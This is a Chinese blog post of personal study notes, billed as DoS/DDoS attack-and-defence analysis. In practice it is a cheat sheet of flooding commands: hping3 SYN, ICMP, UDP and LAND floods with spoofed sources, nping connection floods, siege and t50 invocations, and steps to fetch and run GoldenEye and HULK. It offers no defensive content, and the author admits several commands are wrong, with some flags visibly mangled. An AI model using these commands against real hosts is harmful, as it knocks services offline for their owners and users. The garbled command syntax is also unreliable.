DoS与DdoS攻防分析——其他拒绝服务攻击攻防总结

原創 温柔小薛 2020-05-14 06:31

其他拒绝服务攻击攻防总结

哈哈哈虽然明儿考试但是!!!一天我不写博客真滴睡不香! 而且DoS留下一个小尾巴心里不舒服,今儿感觉复习差不多,就抽点时间把这个课听完了,这里的代码很多错,没有改完,之后做实验再回来改,留个小坑

Kali自带拒绝服务攻击工具

Hping3

几乎可以定制发送任何TCP/IP数据包,用于测试FW、端口扫描、性能测试

Syn Flood 攻击

-hping3 -c 1000 -d 120 -S -w 64 -p 80 - -flood - -rand-source  1.1.1.1
			-hping3 -S -P -U -p 80 - -flood - -rand-source 1.1.1.1
			-hping3 -SARFUP -p 80 - -flood - -rand-source 1.1.1.1 (TCP Flood)

ICMP Flood 攻击

-hping3 -q -n -a 1.1.1.1 - -icmp -d 56 - -flood 1.1.1.2

补充两个参数 --rand-source 用公网随机地址进行攻击
-a 1.1.1.1 伪造成1.1.1.1进行攻击
详细帮助文档:http://cnhotfire.blog.51cto.com/2042323/698362/

UDP Flood 攻击

-hping3 -a 1.1.1.1 - -udp -s 53 -d 100 -p 53 - -flood 1.1.1.2

LAND攻击

特殊种类的SYN Flood攻击
源地址、目的地址都是受害者,受害者于自己完成三次握手

—hping3 -n –a 1.1.1.1 -S -d 100 -p 80 –flood 1.1.1.1

LAND攻者是伪造的源地址和要攻击目标地址是同一个地址,也就是说自己与自己建立连接。可用tcpdump –I eth0 –s 0 –vv查看

TCP全链接DoS攻击

nping --tcp-connect --rate=10000 -c 1000000000 -q 1.1.1.1  
 //--rate=100000 一次建10000个连接,-C是一共建1000000000连接。

查公网IP

-nping - -echo-client "public" echo.nmap.org - -udp

Siege

-http/https压力测试工具,模拟多个用户并发访问请求 —siege

- siege -g http://1.1.1.1/a.php       //扫描网站banner信息
		- siege -i -c 1000 http://1.1.1.1/a.php -A siegehttp  -vv

同时攻击多个url,使用-f调用字典文件 /etc/siege/urls.txt,也可以直接
编辑urls.txt把要攻击的地址放进去直接使用siege –i –c 1000 -vv就可以攻击
Siege攻击一般用作并发量、性能测试,多用户并发访问测试。开发上线一般都会经过这步。
siege -i -c 1000 http://1.1.1.1/a.php -A siegehttp //10000用户并发, -A代表指纹信息,可随便填定。
一般用golden eye代替,后面有

T50网络压力测试

  • t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80
    t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22

Nmap

-grep dos /usr/share/nmap/scripts/script.db |cut -d “”" -f 2

其他拒绝服务攻击

XOIC

攻击任意IP地址的指定端口
git clone git://git.code.sf.net/p/xoic/code xoic-code
https://xoicdoser.wordpress.com/
三种模式:test、normal、DoS Attack
支持协议:TCP/HTTP/UDP/ICMP

DDOSIM

7层拒绝服务工具(模拟多个僵尸机)
随机IP地址 一基于TCP连接的攻击 -应用层DDoS攻击
正常的HTTP请求、非正常的HTTP请求式DDoS -SMTP DDoS
随机端口的TCP连接洪水

GoldenEye

http/https拒绝服务攻击工具
安全研究为目的Python脚本
随机攻击向量,keep-alive,避免缓存命中

-wget https://github.com/jseidl/GoldenEye/archive/master.zip
			-unzip master.zip
			-./goldeneye.py http://1.1.1.1 -w 50 
			goldeneye.py http://1.1.1.1 -w 50 –m random    //-w 50 代表50个人 ,-s 500代表每个人500个,50*500打25000个链接。

HULK - Http Unbearable Load King

Python脚本
随机产生大量唯一的地址请求,避免缓存命中 -耗尽WEB服务器资源池
https://packetstormsecurity.com/files/download/112856/hulk.zip

匿名者攻击工具

匿名者发布的一些DoS工具
LOIC
HOIC
DDoSer
他们招募志愿者发放以上工具
以上DoS工具不隐藏真实IP地址
PS.我啥时候能有个黑客团体呢 哈哈

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

K8s 安全指南

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

Andrew Zola 2021-12-17 17:58:58

中国卓越技术团队访谈录(2021年第六季)

封面故事: 《從零到一,京東物流全量上雲實錄》 上雲不是將物理機搬到雲上,而是將整個系統和應用打造成適合雲的狀態,這樣才能從上雲中獲得最大的效益。“如果企業有能力、有資源,上雲越快越好。” 重磅訪談: 《從混合包開發到100%純鴻蒙應

InfoQ 中文站 2021-12-15 08:03:56

广发证券携手HarmonyOS打造智慧金融服务|HDC2021技术分论坛

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

HarmonyOS开发者社区 2021-12-14 13:34:05

被美国列入投资黑名单,商汤科技紧急回应;传19家互联网大厂裁员;Log4j 爆“核弹级”漏洞,波及Flink等十余个项目 | AI一周资讯

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"blockq

刘燕 2021-12-12 13:38:54

突发!Log4j 爆“核弹级”漏洞,Flink、Kafka等至少十多个项目受影响

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

褚杏娟 2021-12-10 14:08:51

苹果研究人员提出集成反演技术,可从不同机器学习模型中重建训练数据

{"type":"doc","content":[{"type":"heading","attrs":{"align":null,"level":2},"content":[{"type":"text","text":"MI攻擊"}]},{

Nitish Kumar 2021-12-07 10:28:54

2021 专业人士 Linux 系统 TOP 5

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

辛晓亮 2021-12-06 10:13:57

请不起日薪2万+的网络安全人才,就做不好数字化转型吗?

{"type":"doc","content":[{"type":"blockquote","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null

李冬梅 2021-12-02 14:13:53

架构师们,请收好这份多云架构指南

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

Molly Clancy 2021-11-30 15:18:57

云计算成 2022 年最重要技术之一

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

辛晓亮 2021-11-29 16:13:59

腾讯朱雀实验室推出Deep Puzzling,利用AI技术进行代码防护

{"type":"doc","content":[{"type":"blockquote","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null

凌敏 2021-11-29 16:13:59

低代码开发会带来安全问题和数据泄露隐患吗?

{"type":"doc","content":[{"type":"blockquote","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null

The Hosk 2021-11-24 10:03:54

WhatsApp是如何实现端到端加密备份的?

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

Slavik Krassovsky 2021-11-19 09:58:52

腾讯朱雀实验室推出“隐形”水印,助力打击AI模型盗取行为

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

InfoQ编辑部 2021-11-12 16:13:56

配置不当的 Docker 服务器已成为TeamTNT的热门攻击目标

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

Tina 2021-11-11 09:08:47